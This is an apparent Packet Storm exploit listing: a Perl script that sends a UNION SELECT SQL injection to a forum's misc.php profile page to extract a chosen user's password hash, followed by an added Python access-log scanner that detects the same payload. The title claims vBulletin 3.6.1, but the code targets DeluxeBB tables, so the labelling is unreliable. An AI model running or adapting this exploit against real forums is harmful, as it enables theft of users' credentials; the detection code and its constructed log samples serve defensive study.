
vBulletin 3.6.1 SQL Injection

20 Oct 2010 00:00:00 | Reported by jos_ali_joe | Type: packetstorm | Source: packetstormsecurity.com

vBulletin 3.6.1 SQL Injection by jos_ali_jo

Code
`=========================================================  
vBulletin 3.6.1 Remote SQL Injection Exploit  
=========================================================  
  
[+]Title : vBulletin 3.6.1 Remote SQL Injection Exploit  
[+]Author : jos_ali_joe  
[+]Contact : [email protected]  
[+]Home : http://josalijoe.wordpress.com/   
  
  
########################################################################   
  
#!/usr/bin/perl  
  
use IO::Socket;  
  
print q{  
######################################################  
# DeluxeBB Remote SQL Injection Exploit #  
# vbulletin Remote SQL Injection Exploit #  
######################################################  
};  
  
if (!$ARGV[2]) {  
  
print q{  
Usage: perl dbbxpl.pl host /directory/ victim_userid  
  
perl dbbxpl.pl www.nekisite.com /forum/ 1  
  
};  
  
}  
  
$server = $ARGV[0];  
$dir = $ARGV[1];  
$user = $ARGV[2];  
$myuser = $ARGV[3];  
$mypass = $ARGV[4];  
$myid = $ARGV[5];  
  
print "------------------------------------------------------------------------------------------------\r\n";  
print "[>] SERVER: $server\r\n";  
print "[>] DIR: $dir\r\n";  
print "[>] USERID: $user\r\n";  
print "------------------------------------------------------------------------------------------------\r\n\r\n";  
  
$server =~ s/(http:\/\/)//eg;  
  
$path = $dir;  
$path .= "misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ?,0,0+FROM%20deluxebb_users%20WHERE%20(uid='".$user ;  
  
print "[~] PREPARE TO CONNECT...\r\n";  
  
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "[-] CONNECTION FAILED";  
  
print "[+] CONNECTED\r\n";  
print "[~] SENDING QUERY...\r\n";  
print $socket "GET $path HTTP/1.1\r\n";  
print $socket "Host: $server\r\n";  
print $socket "Accept: */*\r\n";  
print $socket "Connection: close\r\n\r\n";  
print "[+] DONE!\r\n\r\n";  
  
print "--[ REPORT ]------------------------------------------------------------------------------------\r\n";  
while ($answer = <$socket>)  
{  
  
if ($answer =~/(\w{32})/)  
{  
  
if ($1 ne 0) {  
print "Password Hash is: ".$1."\r\n";  
print "--------------------------------------------------------------------------------------\r\n";  
  
}  
exit();  
}  
  
}  
print "------------------------------------------------------------------------------------------------\r\n";   
  
########################################################################   
  
Thanx :  
  
./Me Family ATeN4 :  
  
./N4ck0 - Aury - TeRRenJr  
  
Greets For :  
  
./Devilzc0de crew – Kebumen Cyber – Explore Crew – Indonesian Hacker  
  
My Team : ./Indonesian Coder  
`
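
A defender's view of the request the script above builds in `$path`, as an added example that is not part of the original advisory: the Python below scans web-server access logs for requests to `misc.php` with `sub=profile` whose decoded `name` value closes a quote and continues with `UNION SELECT`. The log lines are constructed, the combined log format is an assumption, and the function name is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 3 is a shortened form of the request the script sends; line 4 is the
# same idea percent-encoded and lower-cased.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Oct/2010:10:01:02 +0000] "GET /forum/misc.php?sub=profile&name=alice HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [20/Oct/2010:10:01:03 +0000] "GET /forum/misc.php?sub=profile&name=O%27Brien HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Oct/2010:10:01:05 +0000] "GET /forum/misc.php?sub=profile&name=0')+UNION+SELECT+0,pass,0,0+FROM%20deluxebb_users%20WHERE%20(uid='1 HTTP/1.1" 200 4890 "-" "-"
203.0.113.9 - - [20/Oct/2010:10:01:09 +0000] "GET /forum/misc.php?sub=profile&name=0%27%29%20union%20select%200%2Cpass%20from%20deluxebb_users HTTP/1.1" 200 4890 "-" "-"
198.51.100.4 - - [20/Oct/2010:10:02:00 +0000] "GET /forum/index.php?q=student+union+select+committee HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A quote that closes the string literal, followed later by UNION SELECT.
BREAKOUT = re.compile(r"""['"].*\bunion\s+(?:all\s+)?select\b""", re.I | re.S)


def suspicious_profile_requests(log_text):
    """Return (client_ip, decoded name value) for each flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/misc.php"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces, so encoded
        # and plain forms of the same value are matched alike.
        params = parse_qs(url.query, keep_blank_values=True)
        if "profile" not in params.get("sub", []):
            continue
        for value in params.get("name", []):
            if BREAKOUT.search(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_profile_requests(SAMPLE_LOG):
        print(f"{client}\t{value}")
```

A benign name containing an apostrophe and a `union select` phrase on another script are both left unflagged, because the match is scoped to the endpoint and parameter the script uses.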
